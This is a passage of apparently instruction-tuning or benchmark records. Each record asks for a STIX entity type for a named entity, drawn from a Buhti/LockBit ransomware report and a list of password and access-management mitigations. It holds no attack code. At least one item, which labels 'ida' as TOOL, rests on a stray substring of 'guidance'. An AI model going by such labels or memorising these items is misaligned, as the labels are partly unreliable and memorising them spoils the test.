"input": "### Entity:\nBabuk\n\n---\n\n### Text Passage:\nBuhti: New Ransomware Operation Relies on Repurposed Payloads\nAttackers use rebranded variants of leaked LockBit and Babuk ransomware payloads but use own custom exfiltration tool.\nA relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems.\nWhile the group doesn\u2019t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types.\nBuhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec\u2019s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.\nThe group appears to be quick to exploit recently disclosed vulnerabilities, with one recent attack exploiting the recently patched PaperCut vulnerability. Since Buhti hasn\u2019t been linked to any known cyber-crime group, Symantec has assigned the actor name Blacktail to its operators.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nBuhti\n\n---\n\n### Text Passage:\nLockBit rebrand\nA recent Buhti attack saw the attackers attempt to deploy a ransomware payload against Windows computers on the targeted network. Analysis of the payload revealed that it was a minimally modified version of the leaked LockBit 3.0 (LockBit Black) ransomware.\nEncrypted files are appended with a .buthi extension. The ransom note can be seen in Figure 1.\nFigure 1. Buhti ransom note\nThe ransomware includes a feature that drops a LockBit-branded .bmp file (Figure 2) and makes it the Windows wallpaper, but this functionality was disabled by the attackers.\nFigure 2. Embedded LockBit-branded BMP file found in Buhti payload\nThe ransomware also has the capability to send system information about the infected computer to a command-and-control (C&C) server, but this functionality is also disabled and no C&C server is specified.\nLockBit 3.0 was developed for the Syrphid cyber-crime group (Bitwise Spider), which is the operator of the LockBit ransomware. The builder for the ransomware was leaked in September 2022, allegedly by a disgruntled developer.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWindows\n\n---\n\n### Text Passage:\nLockBit rebrand\nA recent Buhti attack saw the attackers attempt to deploy a ransomware payload against Windows computers on the targeted network. Analysis of the payload revealed that it was a minimally modified version of the leaked LockBit 3.0 (LockBit Black) ransomware.\nEncrypted files are appended with a .buthi extension. The ransom note can be seen in Figure 1.\nFigure 1. Buhti ransom note\nThe ransomware includes a feature that drops a LockBit-branded .bmp file (Figure 2) and makes it the Windows wallpaper, but this functionality was disabled by the attackers.\nFigure 2. Embedded LockBit-branded BMP file found in Buhti payload\nThe ransomware also has the capability to send system information about the infected computer to a command-and-control (C&C) server, but this functionality is also disabled and no C&C server is specified.\nLockBit 3.0 was developed for the Syrphid cyber-crime group (Bitwise Spider), which is the operator of the LockBit ransomware. The builder for the ransomware was leaked in September 2022, allegedly by a disgruntled developer.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC&C\n\n---\n\n### Text Passage:\nLockBit rebrand\nA recent Buhti attack saw the attackers attempt to deploy a ransomware payload against Windows computers on the targeted network. Analysis of the payload revealed that it was a minimally modified version of the leaked LockBit 3.0 (LockBit Black) ransomware.\nEncrypted files are appended with a .buthi extension. The ransom note can be seen in Figure 1.\nFigure 1. Buhti ransom note\nThe ransomware includes a feature that drops a LockBit-branded .bmp file (Figure 2) and makes it the Windows wallpaper, but this functionality was disabled by the attackers.\nFigure 2. Embedded LockBit-branded BMP file found in Buhti payload\nThe ransomware also has the capability to send system information about the infected computer to a command-and-control (C&C) server, but this functionality is also disabled and no C&C server is specified.\nLockBit 3.0 was developed for the Syrphid cyber-crime group (Bitwise Spider), which is the operator of the LockBit ransomware. The builder for the ransomware was leaked in September 2022, allegedly by a disgruntled developer.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nLockBit\n\n---\n\n### Text Passage:\nLockBit rebrand\nA recent Buhti attack saw the attackers attempt to deploy a ransomware payload against Windows computers on the targeted network. Analysis of the payload revealed that it was a minimally modified version of the leaked LockBit 3.0 (LockBit Black) ransomware.\nEncrypted files are appended with a .buthi extension. The ransom note can be seen in Figure 1.\nFigure 1. Buhti ransom note\nThe ransomware includes a feature that drops a LockBit-branded .bmp file (Figure 2) and makes it the Windows wallpaper, but this functionality was disabled by the attackers.\nFigure 2. Embedded LockBit-branded BMP file found in Buhti payload\nThe ransomware also has the capability to send system information about the infected computer to a command-and-control (C&C) server, but this functionality is also disabled and no C&C server is specified.\nLockBit 3.0 was developed for the Syrphid cyber-crime group (Bitwise Spider), which is the operator of the LockBit ransomware. The builder for the ransomware was leaked in September 2022, allegedly by a disgruntled developer.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSyrphid\n\n---\n\n### Text Passage:\nLockBit rebrand\nA recent Buhti attack saw the attackers attempt to deploy a ransomware payload against Windows computers on the targeted network. Analysis of the payload revealed that it was a minimally modified version of the leaked LockBit 3.0 (LockBit Black) ransomware.\nEncrypted files are appended with a .buthi extension. The ransom note can be seen in Figure 1.\nFigure 1. Buhti ransom note\nThe ransomware includes a feature that drops a LockBit-branded .bmp file (Figure 2) and makes it the Windows wallpaper, but this functionality was disabled by the attackers.\nFigure 2. Embedded LockBit-branded BMP file found in Buhti payload\nThe ransomware also has the capability to send system information about the infected computer to a command-and-control (C&C) server, but this functionality is also disabled and no C&C server is specified.\nLockBit 3.0 was developed for the Syrphid cyber-crime group (Bitwise Spider), which is the operator of the LockBit ransomware. The builder for the ransomware was leaked in September 2022, allegedly by a disgruntled developer.\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nBitwise Spider\n\n---\n\n### Text Passage:\nLockBit rebrand\nA recent Buhti attack saw the attackers attempt to deploy a ransomware payload against Windows computers on the targeted network. Analysis of the payload revealed that it was a minimally modified version of the leaked LockBit 3.0 (LockBit Black) ransomware.\nEncrypted files are appended with a .buthi extension. The ransom note can be seen in Figure 1.\nFigure 1. Buhti ransom note\nThe ransomware includes a feature that drops a LockBit-branded .bmp file (Figure 2) and makes it the Windows wallpaper, but this functionality was disabled by the attackers.\nFigure 2. Embedded LockBit-branded BMP file found in Buhti payload\nThe ransomware also has the capability to send system information about the infected computer to a command-and-control (C&C) server, but this functionality is also disabled and no C&C server is specified.\nLockBit 3.0 was developed for the Syrphid cyber-crime group (Bitwise Spider), which is the operator of the LockBit ransomware. The builder for the ransomware was leaked in September 2022, allegedly by a disgruntled developer.\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nLockBit 3.0\n\n---\n\n### Text Passage:\nLockBit rebrand\nA recent Buhti attack saw the attackers attempt to deploy a ransomware payload against Windows computers on the targeted network. Analysis of the payload revealed that it was a minimally modified version of the leaked LockBit 3.0 (LockBit Black) ransomware.\nEncrypted files are appended with a .buthi extension. The ransom note can be seen in Figure 1.\nFigure 1. Buhti ransom note\nThe ransomware includes a feature that drops a LockBit-branded .bmp file (Figure 2) and makes it the Windows wallpaper, but this functionality was disabled by the attackers.\nFigure 2. Embedded LockBit-branded BMP file found in Buhti payload\nThe ransomware also has the capability to send system information about the infected computer to a command-and-control (C&C) server, but this functionality is also disabled and no C&C server is specified.\nLockBit 3.0 was developed for the Syrphid cyber-crime group (Bitwise Spider), which is the operator of the LockBit ransomware. The builder for the ransomware was leaked in September 2022, allegedly by a disgruntled developer.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nida\n\n---\n\n### Text Passage:\n**Identity and Access Management**\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts.\n* Disable password \u201chints.\u201d\n* Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.\nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n* **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nAvoid reusing passwords\n\n---\n\n### Text Passage:\n**Identity and Access Management**\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts.\n* Disable password \u201chints.\u201d\n* Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.\nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n* **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nImplement time-based access for accounts set at the admin level and higher\n\n---\n\n### Text Passage:\n**Identity and Access Management**\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts.\n* Disable password \u201chints.\u201d\n* Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.\nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n* **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", 